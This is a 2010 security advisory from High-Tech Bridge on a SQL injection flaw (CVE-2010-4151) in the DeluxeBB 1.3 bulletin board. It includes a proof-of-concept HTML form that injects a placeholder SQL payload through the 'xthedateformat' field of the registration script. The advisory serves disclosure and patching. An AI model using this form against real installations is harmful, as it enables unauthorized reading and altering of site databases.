High-Tech Bridge Security Advisories are CVE Compatible    High-Tech Bridge Security Advisories CWE Compatibility    High-Tech Bridge Security Advisories CVSS Adopters
Vendor Statistics

285 software vendors have fixed 923 vulnerabilities in their products thanks to High-Tech Bridge Security Research Lab.

Patch Available Upon Disclosure

2014 Q1: 93%2013 Q2: 92%
2013 Q4: 67%2013 Q1: 100%
2013 Q3: 77%2012 Q4: 68%

Vendor Average Time to Patch

2014 Q1: 5 days 2013 Q2: 30 days
2013 Q4: 8 days 2013 Q1: 13 days
2013 Q3: 13 days 2012 Q4: 26 days

High-Tech Bridge Newsletter

Subscribe to our newsletter and receive some or all of our corporate news, invitations to security events or HTB Security Advisories – you choose what you want to receive.

SQL Injection Vulnerability in DeluxeBB

Advisory ID:HTB22641
Product:DeluxeBB
Vendor:DeluxeBB
Vulnerable Versions:1.3 and probably prior
Tested Version:1.3
Advisory Publication:October 5, 2010 [without technical details]
Vendor Notification:October 5, 2010
Public Disclosure:October 19, 2010
Latest Update:October 14, 2010
Vulnerability Type:SQL Injection [CWE-89]
CVE Reference:CVE-2010-4151
Risk Level:High
CVSSv2 Base Score:7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Solution Status:Fixed by Vendor
Discovered and Provided:High-Tech Bridge Security Research Lab
 

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered vulnerability in DeluxeBB which could be exploited to execute arbitrary SQL commands in application`s database.


1) SQL injection vulnerability in DeluxeBB: CVE-2010-4151

An input validation error exists in the "xthedateformat" parameter in /deluxebb/misc.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary SQL commands in application`s database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in database but requires "magic_quotes_gpc" to be disabled.

Exploitation example:


<form action="http://deluxebb/misc.php?sub=register" method="post" name="main" >
<input type="hidden" name="name" value="pentester" />
<input type="hidden" name="pass" value="pentester" />
<input type="hidden" name="pass2" value="pentester" />
<input type="hidden" name="email" value="pentester@htbridge.ch" />
<input type="hidden" name="hideemail" value="0" />
<input type="hidden" name="languagex" value="default" />
<input type="hidden" name="xthetimeoffset" value="0" />
<input type="hidden" name="xthetimeformat" value="24" />
<input type="hidden" name="xthedateformat" value="'SQL_CODE_HERE" />
<input type="hidden" value="" name="redirect" />
<input type="submit" value="Register" name="submit" />
</form>


Solution:
Upgrade to the most recent version


ImmuniWeb® by High-Tech Bridge


References:
[1] High-Tech Bridge Advisory HTB22641 - https://www.htbridge.com/advisory/HTB22641 - SQL Injection Vulnerability in DeluxeBB
[2] DeluxeBB - DeluxeBB is a powerful open source bulletin board, which helps you create your own web communities in less than 10 minutes.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.